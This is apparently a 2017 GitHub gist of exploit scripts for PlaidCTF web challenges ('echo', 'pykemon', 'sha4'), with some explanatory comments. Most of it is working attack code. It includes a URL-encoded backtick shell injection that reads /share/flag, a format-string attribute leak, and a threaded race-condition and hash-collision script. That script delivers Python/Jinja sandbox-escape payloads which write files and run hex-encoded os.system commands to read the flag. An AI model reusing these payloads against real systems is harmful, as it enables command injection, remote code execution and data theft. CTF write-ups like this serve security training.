@junorouse
Created April 24, 2017 03:06
plaid ctf web challs

echo

info: command injection via the input.

echo {input}
from requests import get

flag="PCTF{L"

x="""49
53
115
116
51
110
95
84
48
95
95
114
101
101
101
95
114
101
101
101
101
101
101
95
114
101
101
101
95
108
97
125""".split("\n")

for k in x:
	flag += chr(int(k))

# Show the reconstructed flag and stop here.  Because of this exit(1),
# nothing below this point in the script is ever reached.
print(flag)
exit(1)

"""
http://echo2.chal.pwning.xxx:9977/audio/13dfdabcb06240b28e9f847877601d94/2.wav
http://echo2.chal.pwning.xxx:9977/audio/91752b54f8fb416faac895ff8698ce81/2.wav
http://echo2.chal.pwning.xxx:9977/audio/0e3bc71c6baa4babb86cdad06690890f/2.wav
http://echo2.chal.pwning.xxx:9977/audio/52018cc316f4416cb9ac041cf25cfeeb/2.wav
http://echo2.chal.pwning.xxx:9977/audio/2ded2beb78b5425297a2fc3067537b06/2.wav
http://echo2.chal.pwning.xxx:9977/audio/43a03f68b3124db08bbb1f0e62a933d8/2.wav
"""

# Original exploit loop for the "echo" challenge (dead code as long as the
# exit(1) above remains).  Root cause on the server side: the tweet_N form
# fields end up inside a shell command line, so backtick command
# substitution in a tweet executes on the host.  The fix is to never hand
# user input to a shell at all -- build argument lists or strictly escape.
# Per iteration: tweet_1 extracts the i-th 65000-byte slice of /share/flag
# into /tmp/x and tweet_2 post-processes that file; the response section
# for "Tweet 2" carries the path of the generated audio file, which is
# printed as a full URL.  7..49 is the author's search window for i.
for i in range(7, 50):
	url = "http://echo2.chal.pwning.xxx:9977/?tweet_1=%60head+%2Fshare%2Fflag+-c+"+str(65000*i)+"+%7C+tail+-c+65000+%3E+%2Ftmp%2Fx%60&tweet_2=%60python+-c+%22exec%28%27f%3Dopen%28%5C%27%2Ftmp%2Fx%5C%27%2C+%5C%27rb%5C%27%29%3Bd%3Df.read%28%29%3Bf.close%28%29%3Bj%3D0%3Bc%3D64999%5Cnfor+i+in+range%28c%29%3A+j+%5E%3D+ord%28d%5Bi%5D%29%5Cnprint+j%5Eord%28d%5Bc%5D%29%27%29%22%60&tweet_3=&tweet_4="
	c = get(url)
	# No error handling: this raises IndexError if the response does not
	# contain both markers (injection failed, or the page layout differs).
	x = c.content.split('<h2>Tweet 2</h2>')[1].split('<source src="')[1].split('"')[0]
	print "http://echo2.chal.pwning.xxx:9977/"+x

pykemon

info: format-string substitution in the rename function.

return "Successfully renamed to:\n" + new_name.format(p)

p is a Pykemon object (p = check(name, 'caught')), so the attributes of that object can be read through the format string.

input: {0.pykemon}

sha4

info: race condition combined with a hash collision

make_collision.py

from sha4 import hash, seven_to_eight
import struct
from pyasn1.codec.ber.decoder import decode

# Two candidate inputs for the challenge's custom "sha4" hash, built as
# mutable bytearrays.  Note that `hash` imported from sha4 above shadows
# the builtin of the same name for the rest of this file.
# These two assignments are dead: both names are rebound to the hex
# literals a few lines further down.
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x43"+"\x20"*3+""+"AAAAAA{"+"{\x20\x20\x20\x20\x20\x20" + "\x20}}")
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x43"+"\x20"*3+""+"AAAAAAy"+"z\x20\x20\x20\x20\x20\x20" + "\x20=]")

# Full key pair: the same hex prefixes reappear in poc.py, and the hex
# bodies embed the "''.__class__..." payload that poc.py prints.
# In Python 2, str.decode("hex") returns an immutable str, not a bytearray.
key1 = "0103424242427b7b20332b332020207d7d432020204141414141417b7b20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020207d7d2020202020".decode("hex")
key2 = "010342424242797a20332b332020203d5d43202020414141414141797a20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020203d5d2020202020".decode("hex")
# 010300000041424344

# BER-decode both keys with pyasn1 and print the result.
print decode(str(key1))
print decode(str(key2))

print str(key1).encode("hex")
print str(key2).encode("hex")

# Sanity check: do the two keys collide under sha4?
print hash(key1) == hash(key2)

# print key1 == key2
# Brute-force byte 16 of key2 and report any value that still collides.
# NOTE(review): key2 is a str at this point (rebound above), so the item
# assignment on the next line raises TypeError on the first iteration;
# this loop only works against the earlier bytearray form of key2.
for i in range(0xff+1):
	key2[16] = i
	if hash(key1) == hash(key2):
		print chr(i), str(i)

# print hash("\x01\x01\x01\x00\x00\x00\x00\x00").encode("hex")


def fuck(x):
  [val] = struct.unpack("Q", x+"\x00")
  print hex(val)
  out = 0
  mask = 0b1111111
  for shift in xrange(8):
    out |= (val & (mask<<(7*shift)))<<shift

  print hex(out)  
  return struct.pack("Q", out)

# fuck("C" + "AAAAAA")
# fuck("C" + "AAAAAA")

poc.py

from requests import post
import threading
from time import time, sleep
import sys

"""
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x20"*4)
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x20"*4)

0103424242427b7b20332b332020207d7d43202020
010342424242797a20332b332020203d5d43202020
"""

def pad(x):
	"""Right-pad *x* with spaces up to the next multiple of 7 characters.

	At least one space is always appended: a 7-character input grows to
	14 characters, and an empty string becomes 7 spaces.
	"""
	blocks_needed = len(x) // 7 + 1
	return x.ljust(blocks_needed * 7, " ")

def example(fuck):
	"""Submit one comment to the sha4 challenge and print the page on success.

	The comment is a hex string: one of two fixed prefixes, then
	``sys.argv[2]`` space-padded to a multiple of 7 bytes, a fixed middle
	section, ``sys.argv[1]`` padded the same way, and a fixed suffix.
	``fuck`` selects which of the two variants is sent (True -> the
	"{{ ... }}" bytes, False -> the "yz ... =]" bytes, compare the hex
	prefixes with make_collision.py).  Presumably the two variants hash
	equal under sha4, which is what the concurrent submissions in the
	main loop rely on.

	NOTE(review): exit(0) below runs inside a worker thread; SystemExit
	raised there only ends that thread, so the spawning loop in the main
	thread keeps going.  a1 is assigned but never used (its print is
	commented out), and both sys.argv reads happen on every call.
	"""
	url = "http://sha4.chal.pwning.xxx/comments"
	payload = sys.argv[1]
	asdf = sys.argv[2]

	if fuck == True:
		data = {
			# 'comment': '0103424242427b7b20332b332020207d7d43202020'+"ABCDEFG".encode("hex")
			'comment': '0103424242427b7b20332b332020207d7d43202020'+pad(asdf).encode('hex')+'4141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
		}
	else:
		data = {
			# 'comment': '010342424242797a20332b332020203d5d43202020'+"ABCDEFG".encode("hex")
			'comment': '010342424242797a20332b332020203d5d43202020'+pad(asdf).encode('hex')+'414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
		}

	a1 = time()
	c1 = post(url, data=data)
	# print c1.content
	# return
	# A 200 response whose body contains "B6" is treated as success.
	if c1.status_code == 200 and c1.content.find("B6") != -1:
		print c1.content
		exit(0)
	# print time()-a1
 

# This module-level `payload` only feeds the two diagnostic prints below;
# example() reads its own payload from sys.argv[1], not from this name.
payload = "''.__class__.__mro__[2].__subclasses__()"
print '0103424242427b7b20332b332020207d7d432020204141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
print '010342424242797a20332b332020203d5d43202020414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
# Race driver: keep submitting the two variants concurrently.
# NOTE(review): the loop is unbounded -- threads are started with no join
# and no throttle, so they pile up without limit; and because the exit(0)
# inside example() only terminates the thread that reached it, nothing
# here ever stops the loop (it has to be killed from outside).
while True:
	th = threading.Thread(target=example, args=(False,))
	th.start()

	th = threading.Thread(target=example, args=(True,))
	th.start()

	# th.join()

# input 93

payload

write code to /var/tmp/comments/junoim
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96]), comment[144:146].decode(comment[93:96])).write(comment[147:359].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d2827636174202f7661722f7777772f736861342f666c61675f62696c6161626c75616762696c75617269676c75626c61697265756772706f6f70203e202f7661722f746d702f636f6d6d656e74732f6a756e6f696d2729"

run code via config.from_pyfile
python poc.py "config.from_pyfile(comment[96:144].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"

read the flag
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96])).read()" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"
@junorouse

sha4: there was an easy way to execute commands.
